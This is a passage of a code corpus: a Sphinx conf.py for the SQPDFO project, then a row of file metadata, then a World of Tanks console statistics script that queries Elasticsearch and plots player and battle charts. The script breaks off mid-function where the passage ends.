#
import os
import sys
sys.path.insert(0, os.path.abspath('..'))
import sqpdfo
# -- General configuration ---------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.viewcode']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'SQPDFO'
copyright = "2019, Anke Troeltzsch"
author = "Anke Troeltzsch"
# The version info for the project you're documenting, acts as replacement
# for |version| and |release|, also used in various other places throughout
# the built documents.
#
# The short X.Y version.
version = sqpdfo.__version__
# The full version, including alpha/beta/rc tags.
release = sqpdfo.__version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output -------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a
# theme further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# -- Options for HTMLHelp output ---------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'sqpdfodoc'
# -- Options for LaTeX output ------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto, manual, or own class]).
latex_documents = [
(master_doc, 'sqpdfo.tex',
'SQPDFO Documentation',
'Anke Troeltzsch', 'manual'),
]
# -- Options for manual page output ------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'sqpdfo',
'SQPDFO Documentation',
[author], 1)
]
# -- Options for Texinfo output ----------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'sqpdfo',
'SQPDFO Documentation',
author,
'sqpdfo',
'One line description of project.',
'Miscellaneous'),
]
| 29.288344 | 77 | 0.683703 | [
"BSD-3-Clause"
] | DLR-SC/sqpdfo | docs/conf.py | 4,774 | Python |
from argparse import ArgumentParser
from collections import OrderedDict
from datetime import datetime, timedelta
from elasticsearch6 import Elasticsearch
from json import dump, load
from math import pi, sin, cos
from matplotlib import pyplot as plt
from matplotlib import dates as mdates
from matplotlib import ticker as mtick
from requests import get
from tweepy import OAuthHandler, API
import traceback
# Multi-day, use gte
battles_query = {
"aggs": {
"2": {
"date_histogram": {
"field": "date",
"interval": "1d",
"min_doc_count": 0
},
"aggs": {
"3": {
"terms": {
"field": "console.keyword",
"size": 2,
"order": {
"1": "desc"
},
"min_doc_count": 0
},
"aggs": {
"1": {
"sum": {
"field": "battles"
}
}
}
}
}
}
},
"size": 0,
"_source": {"excludes": []},
"stored_fields": ["*"],
"script_fields": {},
"docvalue_fields": [
{
"field": "date",
"format": "date_time"
}
],
"query": {
"bool": {
"must": [
{"match_all": {}},
{"match_all": {}},
{
"range": {
"date": {
"gte": None,
"lte": None,
"format": "date"
}
}
}
],
"filter": [],
"should": [],
"must_not": []
}
}
}
# Multi-day, use gte
players_query = {
"aggs": {
"2": {
"date_histogram": {
"field": "date",
"interval": "1d",
"min_doc_count": 0
},
"aggs": {
"3": {
"terms": {
"field": "console.keyword",
"size": 2,
"order": {
"_count": "desc"
},
"min_doc_count": 0
}
}
}
}
},
"size": 0,
"_source": {"excludes": []},
"stored_fields": ["*"],
"script_fields": {},
"docvalue_fields": [
{
"field": "date",
"format": "date_time"
}
],
"query": {
"bool": {
"must": [
{"match_all": {}},
{"match_all": {}},
{
"range": {
"date": {
"gte": None,
"lte": None,
"format": "date"
}
}
}
],
"filter": [],
"should": [],
"must_not": []
}
}
}
unique_count_query = {
"aggs": {
"2": {
"terms": {
"field": "console.keyword",
"size": 2,
"order": {
"1": "desc"
}
},
"aggs": {
"1": {
"cardinality": {
"field": "account_id"
}
}
}
}
},
"size": 0,
"_source": {"excludes": []},
"stored_fields": ["*"],
"script_fields": {},
"docvalue_fields": [
{
"field": "date",
"format": "date_time"
}
],
"query": {
"bool": {
"must": [
{"match_all": {}},
{"match_all": {}},
{
"range": {
"date": {
"gte": None,
"lte": None,
"format": "date"
}
}
}
],
"filter": [],
"should": [],
"must_not": []
}
}
}
new_players_query = {
"aggs": {
"2": {
"date_histogram": {
"field": "created_at",
"interval": "1d",
"min_doc_count": 0
},
"aggs": {
"3": {
"terms": {
"field": "console.keyword",
"size": 2,
"order": {
"_count": "desc"
},
"min_doc_count": 0
}
}
}
}
},
"size": 0,
"_source": {"excludes": []},
"stored_fields": ["*"],
"script_fields": {},
"docvalue_fields": [
{
"field": "created_at",
"format": "date_time"
}
],
"query": {
"bool": {
"must": [
{"match_all": {}},
{"match_all": {}},
{
"range": {
"created_at": {
"gte": None,
"lt": None,
"format": "date"
}
}
}
],
"filter": [],
"should": [],
"must_not": []
}
}
}
personal_players_query = {
'sort': [],
'_source': {'excludes': []},
'aggs': {
'2': {
'date_histogram': {
'field': 'date',
'interval': '1d',
'min_doc_count': 0
}
}
},
'stored_fields': ['_source'],
'script_fields': {},
'docvalue_fields': [{'field': 'date', 'format': 'date_time'}],
'query': {
'bool': {
'must': [
{'match_all': {}},
{
'range': {
'date': {
'gt': None,
'lte': None,
'format': 'date'
}
}
}
],
'filter': [],
'should': [],
'must_not': []
}
},
'size': 500
}
accounts_per_battles_range_query = {
'aggs': {
'2': {
'range': {
'field': 'battles',
'ranges': [
{'from': 1, 'to': 5},
{'from': 5, 'to': 10},
{'from': 10, 'to': 20},
{'from': 20, 'to': 30},
{'from': 30, 'to': 40},
{'from': 40, 'to': 50},
{'from': 50}
],
'keyed': True
},
'aggs': {
'3': {
'terms': {
'field': 'console.keyword',
'size': 2,
'order': {'_count': 'desc'}
}
}
}
}
},
'size': 0,
'_source': {'excludes': []},
'stored_fields': ['*'],
'script_fields': {},
'docvalue_fields': [{'field': 'date', 'format': 'date_time'}],
'query': {
'bool': {
'must': [
{'match_all': {}},
{'match_all': {}},
{'range': {'date': {'gt': None, 'lte': None, 'format': 'date'}}}
],
'filter': [],
'should': [],
'must_not': []
}
}
}
five_battles_a_day_query = {
'aggs': {
'4': {
'date_histogram': {
'field': 'date',
'interval': '1d',
'min_doc_count': 0
},
'aggs': {
'3': {
'terms': {
'field': 'console.keyword',
'size': 2,
'order': {'_count': 'desc'}
},
'aggs': {
'2': {
'range': {
'field': 'battles',
'ranges': [{'from': 5, 'to': None}],
'keyed': True
}
}
}
}
}
}
},
'size': 0,
'_source': {'excludes': []},
'stored_fields': ['*'],
'script_fields': {},
'docvalue_fields': [{'field': 'date', 'format': 'date_time'}],
'query': {
'bool': {
'must': [
{'match_all': {}},
{'match_all': {}},
{
'range': {
'date': {
'gte': None,
'lte': None,
'format': 'date'
}
}
}
],
'filter': [],
'should': [],
'must_not': []
}
}
}
CW_TANKS = 'ASSIGN `build_cw_tanks_list(config)` TO ME'
cw_popular_tanks_query = {
"aggs": {
"2": {
"date_histogram": {
"field": "date",
"interval": "1d",
"min_doc_count": 0
},
"aggs": {
"4": {
"terms": {
"field": "console.keyword",
"size": 5,
"order": {
"1": "desc"
}
},
"aggs": {
"1": {
"sum": {
"field": "battles"
}
},
"3": {
"terms": {
"field": "tank_id",
"size": 5,
"order": {
"1": "desc"
}
},
"aggs": {
"1": {
"sum": {
"field": "battles"
}
}
}
}
}
}
}
}
},
"size": 0,
"_source": {
"excludes": []
},
"stored_fields": [
"*"
],
"script_fields": {},
"docvalue_fields": [
{
"field": "date",
"format": "date_time"
}
],
"query": {
"bool": {
"must": [
{
"query_string": {
"query": CW_TANKS,
"analyze_wildcard": True,
"default_field": "*"
}
},
{
"range": {
"date": {
"gte": None,
"lte": None,
"format": "date"
}
}
}
],
"filter": [],
"should": [],
"must_not": []
}
}
}
ww2_popular_tanks_query = {
"aggs": {
"2": {
"date_histogram": {
"field": "date",
"interval": "30m",
"time_zone": "America/Chicago",
"min_doc_count": 0
},
"aggs": {
"4": {
"terms": {
"field": "console.keyword",
"size": 5,
"order": {
"1": "desc"
}
},
"aggs": {
"1": {
"sum": {
"field": "battles"
}
},
"3": {
"terms": {
"field": "tank_id",
"size": 5,
"order": {
"1": "desc"
}
},
"aggs": {
"1": {
"sum": {
"field": "battles"
}
}
}
}
}
}
}
}
},
"size": 0,
"_source": {
"excludes": []
},
"stored_fields": [
"*"
],
"script_fields": {},
"docvalue_fields": [
{
"field": "date",
"format": "date_time"
}
],
"query": {
"bool": {
"must": [
{
"query_string": {
"query": 'NOT (' + CW_TANKS + ')',
"analyze_wildcard": True,
"default_field": "*"
}
},
{
"range": {
"date": {
"gte": None,
"lte": None,
"format": "date"
}
}
}
],
"filter": [],
"should": [],
"must_not": []
}
}
}
BATTLES_PNG = '/tmp/battles.png'
PLAYERS_PNG = '/tmp/players.png'
NEWPLAYERS_PNG = '/tmp/newplayers.png'
AVERAGE_PNG = '/tmp/average.png'
ACCOUNTAGE_PNG = '/tmp/accountage.png'
BATTLERANGE_PNG = '/tmp/battlerange.png'
FIVEADAY_PNG = '/tmp/fiveaday.png'
PLAYERSLONG_PNG = '/tmp/playerslong.png'
BATTLESLONG_PNG = '/tmp/battleslong.png'
AVERAGELONG_PNG = '/tmp/averagelong.png'
MODEBREAKDOWN_PNG = '/tmp/modebreakdown.png'
MODEBREAKDOWNLONG_PNG = '/tmp/modebreakdownlong.png'
MODEBREAKDOWNPERCENT_PNG = '/tmp/modebreakdownpercent.png'
MODEBREAKDOWNPERCENTLONG_PNG = '/tmp/modebreakdownpercentlong.png'
def manage_config(mode, filename='config.json'):
if mode == 'read':
with open(filename) as f:
return load(f)
elif mode == 'create':
with open(filename, 'w') as f:
dump(
{
'days': 14,
'long term': 90,
'omit errors long term': True,
'twitter': {
'api key': '',
'api secret key': '',
'access token': '',
'access token secret': '',
'message': "Today's update on the active player count and total battles per platform for #worldoftanksconsole."
},
'elasticsearch': {
'hosts': ['127.0.0.1']
},
'battle index': 'diff_battles-*',
'tank index': 'diff_tanks-*',
'unique': [7, 14, 30],
'account age': [7, 30, 90, 180, 365, 730, 1095, 1460, 1825],
'battle ranges': [
{"from": 1, "to": 5},
{"from": 5, "to": 10},
{"from": 10, "to": 20},
{"from": 20, "to": 30},
{"from": 30, "to": 40},
{"from": 40, "to": 50},
{"from": 50}
],
'watermark text': '@WOTC_Tracker',
'wg api key': 'DEMO'
}
)
def query_es_for_graphs(config):
now = datetime.utcnow()
then = now - timedelta(days=config['days'])
es = Elasticsearch(**config['elasticsearch'])
# Setup queries
battles_query['query']['bool'][
'must'][-1]['range']['date']['gte'] = then.strftime('%Y-%m-%d')
battles_query['query']['bool'][
'must'][-1]['range']['date']['lte'] = now.strftime('%Y-%m-%d')
players_query['query']['bool'][
'must'][-1]['range']['date']['gte'] = then.strftime('%Y-%m-%d')
players_query['query']['bool'][
'must'][-1]['range']['date']['lte'] = now.strftime('%Y-%m-%d')
new_players_query['query']['bool'][
'must'][-1]['range']['created_at']['gte'] = then.strftime('%Y-%m-%d')
new_players_query['query']['bool'][
'must'][-1]['range']['created_at']['lt'] = now.strftime('%Y-%m-%d')
# Query Elasticsearch
battles = es.search(index=config['battle index'], body=battles_query)
players = es.search(index=config['battle index'], body=players_query)
newplayers = es.search(index='players', body=new_players_query)
# Filter numbers
battles_xbox = []
battles_ps = []
players_xbox = []
players_ps = []
newplayers_xbox = []
newplayers_ps = []
averages_xbox = []
averages_ps = []
for bucket in battles['aggregations']['2']['buckets']:
if not bucket['3']['buckets']:
battles_xbox.append(0)
battles_ps.append(0)
continue
for subbucket in bucket['3']['buckets']:
if subbucket['key'] == 'xbox':
battles_xbox.append(subbucket['1']['value'])
else:
battles_ps.append(subbucket['1']['value'])
for bucket in players['aggregations']['2']['buckets']:
if not bucket['3']['buckets']:
players_xbox.append(0)
players_ps.append(0)
continue
for subbucket in bucket['3']['buckets']:
if subbucket['key'] == 'xbox':
players_xbox.append(subbucket['doc_count'])
else:
players_ps.append(subbucket['doc_count'])
for bucket in newplayers['aggregations']['2']['buckets']:
if not bucket['3']['buckets']:
newplayers_xbox.append(0)
newplayers_ps.append(0)
for subbucket in bucket['3']['buckets']:
if subbucket['key'] == 'xbox':
newplayers_xbox.append(subbucket['doc_count'])
else:
newplayers_ps.append(subbucket['doc_count'])
for b, p in zip(battles_xbox, players_xbox):
averages_xbox.append(b / p)
for b, p in zip(battles_ps, players_ps):
averages_ps.append(b / p)
dates = [b['key_as_string'].split('T')[0] for b in players[
'aggregations']['2']['buckets']]
newplayers_dates = [b['key_as_string'].split('T')[0] for b in newplayers[
'aggregations']['2']['buckets']]
return dates, battles_xbox, battles_ps, players_xbox, players_ps, newplayers_dates, newplayers_xbox, newplayers_ps, averages_xbox, averages_ps
def query_es_for_unique(config):
now = datetime.utcnow()
es = Elasticsearch(**config['elasticsearch'])
unique = {'Xbox': [], 'Playstation': []}
unique_count_query['query']['bool'][
'must'][-1]['range']['date']['lte'] = now.strftime('%Y-%m-%d')
for earliest in config['unique']:
unique_count_query['query']['bool']['must'][-1]['range']['date'][
'gte'] = (now - timedelta(days=earliest)).strftime('%Y-%m-%d')
results = es.search(index=config['battle index'], body=unique_count_query)
for bucket in results['aggregations']['2']['buckets']:
if bucket['key'] == 'xbox':
unique['Xbox'].append(bucket['1']['value'])
else:
unique['Playstation'].append(bucket['1']['value'])
return unique
def create_activity_graphs(dates, battles_xbox, battles_ps, players_xbox, players_ps, newplayers_dates, newplayers_xbox, newplayers_ps, averages_xbox, averages_ps, watermark_text='@WOTC_Tracker'):
shifted_dates = [(datetime.strptime(d, '%Y-%m-%d') - timedelta(days=1)).strftime('%Y-%m-%d') for d in dates]
# Players PNG
plt.clf()
fig = plt.figure(figsize=(11, 8), dpi=150)
fig.suptitle('Active Accounts Per Platform')
# ax1 = plt.axes()
ax1 = fig.add_subplot(111)
ax1.tick_params(axis='x', labelrotation=45)
ax1.ticklabel_format(useOffset=False, style='plain')
ax1.set_xticklabels(shifted_dates, ha='right')
ax1.plot(shifted_dates, players_xbox, color='green', linewidth=2, label='Xbox')
ax1.plot(shifted_dates, players_ps, color='blue', linewidth=2, label='Playstation')
ax1.grid()
ax1.legend()
ax1.text(0.5, 1.05, watermark_text, horizontalalignment='center', verticalalignment='center', transform=ax1.transAxes)
fig.savefig(PLAYERS_PNG)
del fig
# Battles PNG
plt.clf()
fig = plt.figure(figsize=(11, 8), dpi=150)
fig.suptitle('Total Battles Per Platform')
# ax = plt.axes()
ax1 = fig.add_subplot(111)
ax1.tick_params(axis='x', labelrotation=45)
ax1.ticklabel_format(useOffset=False, style='plain')
ax1.set_xticklabels(shifted_dates, ha='right')
ax1.plot(shifted_dates, battles_xbox, color='green', linewidth=2, label='Xbox')
ax1.plot(shifted_dates, battles_ps, color='blue', linewidth=2, label='Playstation')
ax1.grid()
ax1.legend()
ax1.text(0.5, 1.05, watermark_text, horizontalalignment='center', verticalalignment='center', transform=ax1.transAxes)
fig.savefig(BATTLES_PNG)
del fig
# New Players PNG
plt.clf()
fig = plt.figure(figsize=(11, 8), dpi=150)
fig.suptitle('New Accounts Per Platform')
# ax = plt.axes()
ax1 = fig.add_subplot(111)
ax1.tick_params(axis='x', labelrotation=45)
ax1.ticklabel_format(useOffset=False, style='plain')
ax1.set_xticklabels(dates, ha='right')
ax1.plot(newplayers_dates, newplayers_xbox, color='green', linewidth=2, label='Xbox')
ax1.plot(newplayers_dates, newplayers_ps, color='blue', linewidth=2, label='Playstation')
ax1.grid()
ax1.legend()
ax1.text(0.5, 1.05, watermark_text, horizontalalignment='center', verticalalignment='center', transform=ax1.transAxes)
fig.savefig(NEWPLAYERS_PNG)
del fig
# Averages PNG
plt.clf()
fig = plt.figure(figsize=(11, 8), dpi=150)
fig.suptitle('Average Battles Played Per Account Per Platform')
# ax = plt.axes()
ax1 = fig.add_subplot(111)
ax1.tick_params(axis='x', labelrotation=45)
ax1.ticklabel_format(useOffset=False, style='plain')
ax1.set_xticklabels(shifted_dates, ha='right')
ax1.plot(shifted_dates, averages_xbox, color='green', linewidth=2, label='Xbox')
ax1.plot(shifted_dates, averages_ps, color='blue', linewidth=2, label='Playstation')
ax1.grid()
ax1.legend()
ax1.text(0.5, 1.05, watermark_text, horizontalalignment='center', verticalalignment='center', transform=ax1.transAxes)
fig.savefig(AVERAGE_PNG)
del fig
def query_es_for_active_accounts(config):
now = datetime.utcnow()
then = now - timedelta(days=1)
es = Elasticsearch(**config['elasticsearch'])
personal_players_query['query']['bool']['must'][-1]['range']['date']['gt'] = then.strftime('%Y-%m-%d')
personal_players_query['query']['bool']['must'][-1]['range']['date']['lte'] = now.strftime('%Y-%m-%d')
# Get all account IDs of active players
hits = []
response = es.search(index=config['battle index'], body=personal_players_query, scroll='30s')
while len(response['hits']['hits']):
hits.extend(response['hits']['hits'])
response = es.scroll(scroll_id=response['_scroll_id'], scroll='3s')
flattened = [doc['_source']['account_id'] for doc in hits]
# Query account information to get age details
player_info_extracted = []
for i in range(0, len(flattened), 10000):
active_player_info = es.mget(index='players', doc_type='player', body={'ids': flattened[i:i+10000]}, _source=['account_id', 'console', 'created_at'])
player_info_extracted.extend([doc['_source'] for doc in active_player_info['docs']])
sorted_player_info = sorted(player_info_extracted, key = lambda d: d['created_at'])
buckets = {
"xbox": OrderedDict((v, 0) for v in sorted(config['account age'])),
"ps": OrderedDict((v, 0) for v in sorted(config['account age'])),
"all": OrderedDict((v, 0) for v in sorted(config['account age']))
}
# Sum account ages based on range of age
buckets['xbox']['other'] = 0
buckets['ps']['other'] = 0
buckets['all']['other'] = 0
for player in sorted_player_info:
delta = now - datetime.strptime(player['created_at'], '%Y-%m-%dT%H:%M:%S')
for key in buckets['all'].keys():
if not isinstance(key, int):
buckets['all'][key] += 1
buckets[player['console']][key] += 1
break
elif delta.total_seconds() <= (key * 24 * 60 * 60):
buckets['all'][key] += 1
buckets[player['console']][key] += 1
break
return buckets
def calc_label(value):
if value < 7:
return '{} day{}'.format(value, '' if value == 1 else 's')
elif 7 <= value < 30:
return '{} week{}'.format(value // 7, '' if value // 7 == 1 else 's')
elif 30 <= value < 365:
return '{} month{}'.format(value // 30, '' if value // 30 == 1 else 's')
else:
return '{} year{}'.format(value // 365, '' if value // 365 == 1 else 's')
def calc_angle(wedge):
return (wedge.theta2 - wedge.theta1) / 2 + wedge.theta1
def create_account_age_chart(buckets, watermark_text='@WOTC_Tracker'):
plt.clf()
fig = plt.figure(figsize=(11, 8), dpi=150)
then = datetime.utcnow() - timedelta(days=1)
fig.suptitle("Breakdown of active accounts by account age for {}".format(then.strftime('%Y-%m-%d')))
ax1 = plt.subplot2grid((11, 1), (0, 0), rowspan=10)
ax1.axis('equal')
size = 0.125
outer_labels = []
prev = 0
for key in buckets['all'].keys():
if not isinstance(key, int):
outer_labels.append('>' + calc_label(prev))
else:
outer_labels.append('{} - {}'.format(calc_label(prev), calc_label(key)))
prev = key
# Outer pie chart
outer_cmap = plt.get_cmap("binary")
outer_colors = outer_cmap([i * 10 for i in range(10, len(buckets['all'].keys()) + 11)])
outer_wedges, outer_text, outer_autotext = ax1.pie(
buckets['all'].values(),
explode=[0.1 for __ in outer_labels],
radius=1,
colors=outer_colors,
wedgeprops=dict(width=size, edgecolor='w'),
autopct='%1.1f%%',
pctdistance=1.1
#labels=outer_labels
)
bbox_props = dict(boxstyle='square,pad=0.3', fc='w', ec='k', lw=0.72)
kw = dict(arrowprops=dict(arrowstyle='-'), bbox=bbox_props, zorder=0, va='center')
for i, wedge in enumerate(outer_wedges):
angle = calc_angle(wedge)
y = sin(angle * (pi / 180))
x = cos(angle * (pi / 180))
align = 'right' if x < 0 else 'left'
connectionstyle = 'angle,angleA=0,angleB={}'.format(angle)
kw['arrowprops'].update({'connectionstyle': connectionstyle})
ax1.annotate(
outer_labels[i],
xy=(x, y),
xytext=(1.35*(-1 if x < 0 else 1), 1.4*y),
horizontalalignment=align,
**kw
)
# Inner pie chart
inner_cmap = plt.get_cmap("tab20c")
pie_flat = list(zip(buckets['xbox'].values(), buckets['ps'].values()))
inner_labels = []
for pair in pie_flat:
inner_labels.extend(['xbox', 'ps'])
inner_colors = inner_cmap([1 if console == 'ps' else 9 for console in inner_labels])
inner_wedges, inner_text, inner_autotext = ax1.pie(
[item for sublist in pie_flat for item in sublist],
explode=[0.1 for __ in inner_labels],
radius=1.05-size,
colors=inner_colors,
wedgeprops=dict(width=size, edgecolor='w'),
autopct='',
pctdistance=0.9
)
# Replace inner text with actual values
for i, label, wedge, text in zip(range(len(inner_wedges)), inner_labels, inner_wedges, inner_autotext):
text.set_text(buckets[label]['other' if i // 2 > len(buckets['all'].keys()) - 1 else list(buckets['all'].keys())[i // 2]])
angle = calc_angle(wedge)
if 90 < angle < 270:
angle += 180
text.set_rotation(angle)
# Patch inner wedges to group together in explosion
# Influenced by: https://stackoverflow.com/a/20556088/1993468
groups = [[i, i+1] for i in range(0, len(inner_wedges), 2)]
radfraction = 0.1
for group in groups:
angle = ((inner_wedges[group[-1]].theta2 + inner_wedges[group[0]].theta1)/2) * (pi / 180)
for g in group:
wedge = inner_wedges[g]
wedge.set_center((radfraction * wedge.r * cos(angle), radfraction * wedge.r * sin(angle)))
# Add subplot in second row, below nested pie chart
ax2 = plt.subplot2grid((11, 1), (10, 0))
ax2.axhline(color='black', y=0)
# Xbox, Playstation
totals = [sum(buckets['xbox'].values()), sum(buckets['ps'].values()), sum(buckets['all'].values())]
ypos = -0.18
bottom = 0
height = 0.1
for i in range(len(totals) - 1):
width = totals[i] / totals[-1]
ax2.barh(ypos, width, height, left=bottom, color=inner_colors[i])
xpos = bottom + ax2.patches[i].get_width() / 2
bottom += width
ax2.text(xpos, ypos, '{} ({:.1f}%)'.format(totals[i], (totals[i] / totals[-1]) * 100), ha='center', va='center')
ax2.axis('off')
ax2.set_title('Total Active Players', y=0.325)
ax2.set_xlim(0, 1)
ax1.legend(inner_wedges[-2:], ['xbox', 'ps'], loc='lower right')
fig.text(0.5, 0.5, watermark_text, horizontalalignment='center', verticalalignment='center', transform=ax1.transAxes)
fig.savefig(ACCOUNTAGE_PNG)
del fig
def query_es_for_accounts_by_battles(config):
now = datetime.utcnow()
then = now - timedelta(days=1)
es = Elasticsearch(**config['elasticsearch'])
accounts_per_battles_range_query['query']['bool']['must'][-1]['range']['date']['gt'] = then.strftime('%Y-%m-%d')
accounts_per_battles_range_query['query']['bool']['must'][-1]['range']['date']['lte'] = now.strftime('%Y-%m-%d')
if 'battle ranges' in config:
accounts_per_battles_range_query['aggs']['2']['range']['ranges'] = config['battle ranges']
response = es.search(index=config['battle index'], body=accounts_per_battles_range_query)
buckets = {
"xbox": OrderedDict((v, 0) for v in response['aggregations']['2']['buckets'].keys()),
"ps": OrderedDict((v, 0) for v in response['aggregations']['2']['buckets'].keys()),
"all": OrderedDict((v, 0) for v in response['aggregations']['2']['buckets'].keys()),
}
for key, value in response['aggregations']['2']['buckets'].items():
buckets['all'][key] = value['doc_count']
for bucket in value['3']['buckets']:
buckets[bucket['key']][key] = bucket['doc_count']
return buckets
def create_accounts_by_battles_chart(buckets, watermark_text='@WOTC_Tracker'):
plt.clf()
fig = plt.figure(figsize=(11, 8), dpi=150)
then = datetime.utcnow() - timedelta(days=1)
fig.suptitle("Breakdown of accounts by number of battles played for {}".format(then.strftime('%Y-%m-%d')))
# ax1 = plt.subplot2grid((11, 1), (0, 0), rowspan=10)
ax1 = plt.axes()
ax1.axis('equal')
size = 0.125
outer_labels = []
prev = 0
for key in buckets['all'].keys():
parts = key.split('-')
outer_labels.append('{}-{} battles'.format(int(float(parts[0])) if parts[0] != '*' else parts[0], int(float(parts[1])) - 1 if parts[1] != '*' else parts[1]))
# Outer pie chart
outer_cmap = plt.get_cmap("binary")
outer_colors = outer_cmap([i * 10 for i in range(10, len(buckets['all'].keys()) + 11)])
outer_wedges, outer_text, outer_autotext = ax1.pie(
buckets['all'].values(),
explode=[0.1 for __ in outer_labels],
radius=1,
colors=outer_colors,
wedgeprops=dict(width=size, edgecolor='w'),
autopct='%1.1f%%',
pctdistance=1.1
#labels=outer_labels
)
bbox_props = dict(boxstyle='square,pad=0.3', fc='w', ec='k', lw=0.72)
kw = dict(arrowprops=dict(arrowstyle='-'), bbox=bbox_props, zorder=0, va='center')
for i, wedge in enumerate(outer_wedges):
angle = calc_angle(wedge)
y = sin(angle * (pi / 180))
x = cos(angle * (pi / 180))
align = 'right' if x < 0 else 'left'
connectionstyle = 'angle,angleA=0,angleB={}'.format(angle)
kw['arrowprops'].update({'connectionstyle': connectionstyle})
ax1.annotate(
outer_labels[i],
xy=(x, y),
xytext=(1.35*(-1 if x < 0 else 1), 1.4*y),
horizontalalignment=align,
**kw
)
# Inner pie chart
inner_cmap = plt.get_cmap("tab20c")
pie_flat = list(zip(buckets['xbox'].values(), buckets['ps'].values()))
inner_labels = []
for pair in pie_flat:
inner_labels.extend(['xbox', 'ps'])
inner_colors = inner_cmap([1 if console == 'ps' else 9 for console in inner_labels])
inner_wedges, inner_text, inner_autotext = ax1.pie(
[item for sublist in pie_flat for item in sublist],
explode=[0.1 for __ in inner_labels],
radius=1.05-size,
colors=inner_colors,
wedgeprops=dict(width=size, edgecolor='w'),
autopct='',
pctdistance=0.9
)
# Replace inner text with actual values
for i, label, wedge, text in zip(range(len(inner_wedges)), inner_labels, inner_wedges, inner_autotext):
text.set_text(buckets[label]['other' if i // 2 > len(buckets['all'].keys()) - 1 else list(buckets['all'].keys())[i // 2]])
angle = calc_angle(wedge)
if 90 < angle < 270:
angle += 180
text.set_rotation(angle)
# Patch inner wedges to group together in explosion
# Influenced by: https://stackoverflow.com/a/20556088/1993468
groups = [[i, i+1] for i in range(0, len(inner_wedges), 2)]
radfraction = 0.1
for group in groups:
angle = ((inner_wedges[group[-1]].theta2 + inner_wedges[group[0]].theta1)/2) * (pi / 180)
for g in group:
wedge = inner_wedges[g]
wedge.set_center((radfraction * wedge.r * cos(angle), radfraction * wedge.r * sin(angle)))
ax1.legend(inner_wedges[-2:], ['xbox', 'ps'], loc='lower right')
fig.text(0.5, 0.5, watermark_text, horizontalalignment='center', verticalalignment='center', transform=ax1.transAxes)
fig.savefig(BATTLERANGE_PNG)
del fig
def query_five_battles_a_day_minimum(config):
now = datetime.utcnow()
then = now - timedelta(days=config['days'])
es = Elasticsearch(**config['elasticsearch'])
five_battles_a_day_query['query']['bool']['must'][-1]['range']['date']['lte'] = now.strftime('%Y-%m-%d')
five_battles_a_day_query['query']['bool']['must'][-1]['range']['date']['gte'] = then.strftime('%Y-%m-%d')
response = es.search(index=config['battle index'], body=five_battles_a_day_query)
buckets = {
"xbox": OrderedDict(),
"ps": OrderedDict(),
"all": OrderedDict()
}
for bucket in response['aggregations']['4']['buckets']:
key = bucket['key_as_string'].split('T')[0]
buckets['xbox'][key] = 0
buckets['ps'][key] = 0
buckets['all'][key] = 0
for subbucket in bucket['3']['buckets']:
buckets[subbucket['key']][key] = subbucket['2']['buckets']['5.0-*']['doc_count']
buckets['all'][key] = buckets['xbox'][key] + buckets['ps'][key]
return buckets
# Requested by Khorne Dog in the forums
def create_five_battles_minimum_chart(buckets, watermark_text='@WOTC_Tracker'):
plt.clf()
fig = plt.figure(figsize=(11, 8), dpi=150)
fig.suptitle("Number of accounts having played at least 5 battles")
ax1 = fig.add_subplot(111)
width = 0.25
keys = [datetime.strptime(d, '%Y-%m-%d') - timedelta(days=1) for d in buckets['all'].keys()]
xkeys = [d - timedelta(hours=3) for d in keys]
pkeys = [d + timedelta(hours=3) for d in keys]
xbox_bars = ax1.bar(xkeys, buckets['xbox'].values(), width=width, color='g')
ps_bars = ax1.bar(pkeys, buckets['ps'].values(), width=width, color='b')
ax1.table(
cellText=[
list(buckets['xbox'].values()),
list(buckets['ps'].values()),
list(buckets['all'].values())],
rowLabels=['xbox', 'ps', 'all'],
colLabels=[d.strftime('%Y-%m-%d') for d in keys],
loc='bottom')
ax1.set_ylabel('Accounts')
ax1.set_xticks([])
ax1.legend((xbox_bars[0], ps_bars[0]), ('xbox', 'ps'))
ax1.text(0.5, 1.05, watermark_text, horizontalalignment='center', verticalalignment='center', transform=ax1.transAxes)
fig.savefig(FIVEADAY_PNG)
def query_long_term_data(config, filter_server_failures=True):
now = datetime.utcnow()
then = now - timedelta(days=config.get('long term', 90) + 1)
es = Elasticsearch(**config['elasticsearch'])
# Setup queries
battles_query['query']['bool'][
'must'][-1]['range']['date']['gte'] = then.strftime('%Y-%m-%d')
battles_query['query']['bool'][
'must'][-1]['range']['date']['lte'] = now.strftime('%Y-%m-%d')
players_query['query']['bool'][
'must'][-1]['range']['date']['gte'] = then.strftime('%Y-%m-%d')
players_query['query']['bool'][
